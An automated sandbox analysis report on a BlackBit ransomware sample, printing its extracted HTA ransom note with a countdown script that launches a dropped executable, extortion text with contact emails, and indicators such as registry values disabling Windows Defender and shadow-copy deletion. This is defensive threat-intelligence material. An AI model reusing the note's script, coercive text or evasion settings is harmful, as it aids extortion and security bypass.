8af2354b99c64fd9d40ddb0a1ac8f5b77ed4859ee7a0f60a93acb80bf8068187

Analysis

max time kernel
121s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2023 10:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Size

500KB
MD5

3a7c3e8a378cd7a4fd83910937c23b19
SHA1

395ce78f0eade3fc026122d18049edc7231827b7
SHA256

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21
SHA512

3115fac1a8590f7c9cfc50793d43cbfb9688d8bc12cb56725a7040c0471c68e4b2b3bf177c1e2233e28c3259f7086ad861b3e2ea1fb050dac83a360b24efc00a
SSDEEP

12288:5h1Lk70Tnvjc+VqXbLyMTBkAuvtmfHq6/c/1hN6+0:lk70Trc+8LLNBc8q+c/96+0

Score

10^/10

evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note

<html><head> <title>BLACKBIT</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head><style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}.header{text-align: center;}#t{color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; border-bottom: 0; font-size: 2vw;}</style><script>var countDownDate = new Date(2023,3,7,12,1,38).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false); } }, 1000);</script><body> <div class="header"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAK8AAAAaCAMAAAD2S/yBAAAApVBMVEUAAAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD/AAD+AAD+AAD+AAD+AAD+AAD/AAD+AAD/AAD+AAD+AAD/AAD/AAD+AAD+AAD/AAD+AAD/AAD+AAD+AAD+AAD+AAD/AAD9AAD+AAD+AAD+AAD9AAD+AAD+AAD+AAD+AAD/AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD+AAD/AABnlV0xAAAANnRSTlMA/vyzvu05CflgGgfx4EUUXIg19SIxdCsN6T3PqeZmEVfZoh4YxpZRJcyxjIFurJzjuY97TkJTP9VxAAAENUlEQVRYw7WX2ZqiMBCFIYCgIi6MDbgAKtruy9jW+z/anLDTbYSZzzkXAkkl/iEnSSHF6vQMw/BaS/7rbD1c1rr0b+rGkv6zJtPp9PEhE7FQ3xHXJq2JFEUJnrbxUXN2v/WjXOdcvc0qK0LUOLuPzoqyH5UbWEqhmZ/15s4U5YHrSvkuKYuwrLYRYx4I8mQWJhW/8NR5yntFDfuqvNsjo0xmViMTWeltf4cWR6msNpXVG6eBGtEAV4e+K/+rG3Ht9JDxS2dNpvOadyITNCsXHWQqZH995+0qybyJeUlrNeNFSA9P89VW47jBr06Pdu5L3guRQeS5JYMAzfz45DrYuHWqvN0lkXyWfvCah2EihRFdgzJvlFSgIaVBRcvWcrm0pBN+N9FKa7dsurziDeZEv02iMC9x8aRl5uTTpFR5h7hT9Z+8vXx13hHhF7wFGgb6fP1vR6Px2HGlmT1qM9l/wfuQyVjBRLe8xGEkt/OnI9P2epn3hJupK73i1Rd4j3/D62gELQIpWCyC36Q5Yl7YYS2FMtl55ZgRGxVvexJU/Dsw0DFixbzQFHP2F7x8K0t955h7d00LV8Srm3zq+jZ+n/NCZd4JIj1Hei/vhSCWzOlZvmPNDUS8nxgXttg9LNmEd6zF3n4vb5sRtEx4GNmT1lnoBwV2SLDtqJ4XIyfDkup4RzbRvTGvYxI0dfN7byVcbx3Un7hLPVxredtTDGsgCXjno3Gi0EPYtimvuyBIi+P1aeyMkZA3JDL6sW0wwlpeA32dJBEvsVRyHNaUt7MuzLshituKeAvffskkO3W8xKNFvBUt3Ka87YE+I9qUjDwTn8eBkfUXwBjHBrzMF/IyM5XB/7Qh78hgQ3eYZJEdLXZGX8zrozpdZksYolvDe1rE6YRovemlGZYfjXj7CxQpbjIb3T1B7FPMuyvONQv23NbtD1sPwPX7Q4SwYSPeM0GGVeQ+8fYg4t3ybKaX6Ir6Ye3+2zL5cfG2/ReZOooOhTvsJLkU8J6oql79+WbZAN6+iXcS462LdtKQuO4C3jUfXS48TH7y6o5b8HIwnj9Eb+GNrsSlziBfOuD3PKcX58UvRnRqZXpo6bbiMO75Ije8nov8LJ3DXfCSt9soP9NvlEvrtGVKZT8E/r1jKEEl6+jp6dZ2zab8C2O6VfPfQ23+6zfKf7fH43FNsVj4S6NMx3x/OH7kmuAt9Ij2ZTehXSt7g157wvXx7PtixvfX7g9e7Z72vcQY50EdrxOGYSuxBDD2lEmVUt6KhliMLO6sEMxziYEuNd9vt9rvN8xpDe9qzsOslsndsPKLNR+JeIeId6WSNmjZjYE2jDJ5n0++j6c138dzRNbwKgaX5wwMww5XnpHKnmSHjlqRD7+q6rB6NqJ8lJ4eqmZyzS+55/NKKFJU9Zb2nDUopNz7We61V1WrCHJQmfroD4WF/RlB+MnGAAAAAElFTkSuQmCC"> <h1 id="t">All your files have been encrypted by BLACKBIT!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">Filesupport@airmail.cc</span> </p><br></div><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">unlockerhelp@onionmail.org</span> <br>Your unique ID is : <span class="m">143487C4</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body></html>

Emails

class="m">Filesupport@airmail.cc</span>

class="m">unlockerhelp@onionmail.org</span>

URLs

http-equiv="x-ua-compatible"

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note

All your files have been encrypted by BLACKBIT! All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email Filesupport@airmail.cc You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay Double . In case of no answer in 24 hours (1 Day) write to this email unlockerhelp@onionmail.org Your unique ID is : 143487C4 You only have LIMITED time to get back your files! If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED. You will lose some of your data on day 2 in the timer. You can buy more time for pay. Just email us. THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

Filesupport@airmail.cc

unlockerhelp@onionmail.org

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

1836 netsh.exe
1660 netsh.exe

pid	process
1836	netsh.exe
1660	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Drops startup file 3 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Drops desktop.ini file(s) 28 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Public\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\acyxqodb.BlackBit"	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

Drops file in Program Files directory 64 IoCs

Processes:

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\subs-illustration.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_duplicate_18.svg	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedLargeTile.scale-100_contrast-black.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-150.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-100.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-48_altform-lightunplated.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-80_altform-lightunplated.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ppd.xrm-ms	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-72_altform-lightunplated.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-125.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MicrosoftLogo.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity@4x.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\osmuxmui.msi.16.en-us.vreg.dat	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\LargeLogo.scale-125_contrast-black.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-24_altform-unplated.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageMedTile.scale-125_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_0.m4a	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\messaging\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-256_altform-unplated_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\hi-IN\View3d\3DViewerProductDescription-universal.xml	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\AppStore_icon.svg	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ul-oob.xrm-ms	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-pl.xrm-ms	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\System\ole db\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\MedTile.scale-200.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf-2x.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.INF	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files\Windows Defender\es-ES\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsSmallTile.scale-100.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-64_altform-lightunplated.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\Restore-My-Files.txt	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Crossmark_White@1x.png	2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21.exe
